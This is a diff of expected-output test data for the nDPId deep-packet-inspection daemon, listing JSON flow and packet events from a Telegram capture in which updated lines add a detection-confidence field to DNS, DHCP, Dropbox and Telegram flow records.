+00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1373,"source":"telegram.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779650651,"flow_last_seen":1588779650651,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1588779650651,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":58615,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"},"dns": {"query":"telemetry.dropbox.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1374,"source":"telegram.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779650652,"flow_last_seen":1588779650652,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"ts_msec":1588779650652,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":49533,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1374,"source":"telegram.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1588779650652,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":85,"pkt_l4_len":51,"ts_msec":1588779650652,"pkt":"EBMx8Tl2KDc3AG3ICABFAABHeaUAAP8RvmHAqAFNwKgBAcF9ADUAM+X9HKUBAAABAAAAAAAABWU0NTE4BGRzY3gKYWthbWFpZWRnZQNuZXQAAAEAAQ=="}
-00746{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1374,"source":"telegram.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779650652,"flow_last_seen":1588779650652,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"ts_msec":1588779650652,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":49533,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"e4518.dscx.akamaiedge.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00772{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1374,"source":"telegram.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779650652,"flow_last_seen":1588779650652,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"ts_msec":1588779650652,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":49533,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"e4518.dscx.akamaiedge.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1376,"source":"telegram.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1588779650666,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":101,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":101,"pkt_l4_len":67,"ts_msec":1588779650666,"pkt":"KDc3AG3IEBMx8Tl2CABFAABXLE1AADkRkarAqAEBwKgBTQA1wX0AQwAAHKWBgAABAAEAAAAABWU0NTE4BGRzY3gKYWthbWFpZWRnZQNuZXQAAAEAAcAMAAEAAQAAAAcABFx69t8="}
-00762{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1376,"source":"telegram.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1588779650652,"flow_last_seen":1588779650666,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1588779650666,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":49533,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"e4518.dscx.akamaiedge.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"92.122.246.223"}}
+00788{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1376,"source":"telegram.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1588779650652,"flow_last_seen":1588779650666,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1588779650666,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":49533,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"e4518.dscx.akamaiedge.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"92.122.246.223"}}
 00539{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1378,"source":"telegram.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1588779650681,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"ts_msec":1588779650681,"pkt":"KDc3AG3IEBMx8Tl2CABFAABtxO5AADkR+PLAqAEBwKgBTQA15PcAWQAAO7GBgAABAAIAAAAACXRlbGVtZXRyeQdkcm9wYm94A2NvbQAAAQABwAwABQABAAAAcAAOCXRlbGVtZXRyeQF2wBbAMwABAAEAAAA8AASifRMJ"}
-00762{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1378,"source":"telegram.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1588779650651,"flow_last_seen":1588779650681,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":60,"midstream":0,"ts_msec":1588779650681,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":58615,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"},"dns": {"query":"telemetry.dropbox.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"162.125.19.9"}}
+00788{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1378,"source":"telegram.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1588779650651,"flow_last_seen":1588779650681,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":60,"midstream":0,"ts_msec":1588779650681,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":58615,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"},"dns": {"query":"telemetry.dropbox.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"162.125.19.9"}}
 00605{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1389,"source":"telegram.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1588779650842,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"ts_msec":1588779650842,"pkt":"AQBef\/\/6wJrQLWJ0CABFAACaJ+EAAAER35rAqAE17\/\/\/+txAB2wAhjvUTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KDQoA"}
 00605{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1481,"source":"telegram.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":3,"flow_last_seen":1588779652844,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"ts_msec":1588779652844,"pkt":"AQBef\/\/6wJrQLWJ0CABFAACajVgAAAEReiPAqAE17\/\/\/+txAB2wAhjvUTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KDQoA"}
-00643{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1588779629044,"flow_last_seen":1588779629045,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":38,"midstream":0,"ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":5812,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
-00645{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1588779615019,"flow_last_seen":1588779615032,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":61120,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
-00645{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1588779625981,"flow_last_seen":1588779625981,"flow_idle_time":180000,"flow_min_l4_payload_len":355,"flow_max_l4_payload_len":355,"flow_tot_l4_payload_len":355,"flow_avg_l4_payload_len":355,"midstream":0,"ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DHCP","breed":"Acceptable","category":"Network"}}
-00650{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1588779596451,"flow_last_seen":1588779651446,"flow_idle_time":180000,"flow_min_l4_payload_len":279,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":3348,"flow_avg_l4_payload_len":279,"midstream":0,"ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DHCP","breed":"Acceptable","category":"Network"}}
-00656{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1588779601222,"flow_last_seen":1588779632305,"flow_idle_time":180000,"flow_min_l4_payload_len":464,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":928,"flow_avg_l4_payload_len":464,"midstream":0,"ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
-00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":123,"flow_first_seen":1588779616036,"flow_last_seen":1588779620617,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":256,"flow_tot_l4_payload_len":21280,"flow_avg_l4_payload_len":173,"midstream":0,"ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.8.7","src_port":23174,"dst_port":521,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Telegram","breed":"Acceptable","category":"Chat"}}
-00650{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1588779616036,"flow_last_seen":1588779618928,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":1456,"flow_avg_l4_payload_len":69,"midstream":0,"ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.12.5","src_port":23174,"dst_port":523,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Telegram","breed":"Acceptable","category":"Chat"}}
-00650{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1588779616036,"flow_last_seen":1588779619034,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":1360,"flow_avg_l4_payload_len":68,"midstream":0,"ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.16.1","src_port":23174,"dst_port":527,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Telegram","breed":"Acceptable","category":"Chat"}}
-00650{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1588779616036,"flow_last_seen":1588779618946,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":1456,"flow_avg_l4_payload_len":69,"midstream":0,"ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.12.1","src_port":23174,"dst_port":536,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Telegram","breed":"Acceptable","category":"Chat"}}
-00650{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1588779616036,"flow_last_seen":1588779619007,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":1360,"flow_avg_l4_payload_len":68,"midstream":0,"ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.16.4","src_port":23174,"dst_port":538,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Telegram","breed":"Acceptable","category":"Chat"}}
-00649{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1588779616036,"flow_last_seen":1588779618748,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":1360,"flow_avg_l4_payload_len":68,"midstream":0,"ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.8.8","src_port":23174,"dst_port":538,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Telegram","breed":"Acceptable","category":"Chat"}}
-00656{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1588779619914,"flow_last_seen":1588779619916,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":47127,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"}}
+00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1588779629044,"flow_last_seen":1588779629045,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":38,"midstream":0,"ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":5812,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1588779615019,"flow_last_seen":1588779615032,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":61120,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1588779625981,"flow_last_seen":1588779625981,"flow_idle_time":180000,"flow_min_l4_payload_len":355,"flow_max_l4_payload_len":355,"flow_tot_l4_payload_len":355,"flow_avg_l4_payload_len":355,"midstream":0,"ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}}
+00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1588779596451,"flow_last_seen":1588779651446,"flow_idle_time":180000,"flow_min_l4_payload_len":279,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":3348,"flow_avg_l4_payload_len":279,"midstream":0,"ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}}
+00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1588779601222,"flow_last_seen":1588779632305,"flow_idle_time":180000,"flow_min_l4_payload_len":464,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":928,"flow_avg_l4_payload_len":464,"midstream":0,"ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
+00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":123,"flow_first_seen":1588779616036,"flow_last_seen":1588779620617,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":256,"flow_tot_l4_payload_len":21280,"flow_avg_l4_payload_len":173,"midstream":0,"ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.8.7","src_port":23174,"dst_port":521,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}}
+00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1588779616036,"flow_last_seen":1588779618928,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":1456,"flow_avg_l4_payload_len":69,"midstream":0,"ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.12.5","src_port":23174,"dst_port":523,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}}
+00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1588779616036,"flow_last_seen":1588779619034,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":1360,"flow_avg_l4_payload_len":68,"midstream":0,"ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.16.1","src_port":23174,"dst_port":527,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}}
+00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1588779616036,"flow_last_seen":1588779618946,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":1456,"flow_avg_l4_payload_len":69,"midstream":0,"ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.12.1","src_port":23174,"dst_port":536,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}}
+00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1588779616036,"flow_last_seen":1588779619007,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":1360,"flow_avg_l4_payload_len":68,"midstream":0,"ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.16.4","src_port":23174,"dst_port":538,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}}
+00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1588779616036,"flow_last_seen":1588779618748,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":1360,"flow_avg_l4_payload_len":68,"midstream":0,"ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.8.8","src_port":23174,"dst_port":538,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}}
+00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1588779619914,"flow_last_seen":1588779619916,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":47127,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"}}
 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779615962,"flow_last_seen":1588779615962,"flow_idle_time":180000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":49,"midstream":0,"ts_msec":1588779655298,"l3_proto":"ip6","src_ip":"fe80::4dc:edec:5b0c:a661","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00655{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1588779601223,"flow_last_seen":1588779632305,"flow_idle_time":180000,"flow_min_l4_payload_len":464,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":928,"flow_avg_l4_payload_len":464,"midstream":0,"ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
-00654{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1588779611355,"flow_last_seen":1588779611657,"flow_idle_time":180000,"flow_min_l4_payload_len":125,"flow_max_l4_payload_len":125,"flow_tot_l4_payload_len":375,"flow_avg_l4_payload_len":125,"midstream":0,"ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.75","dst_ip":"239.255.255.250","src_port":57916,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
-00644{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1588779600828,"flow_last_seen":1588779600842,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":61631,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
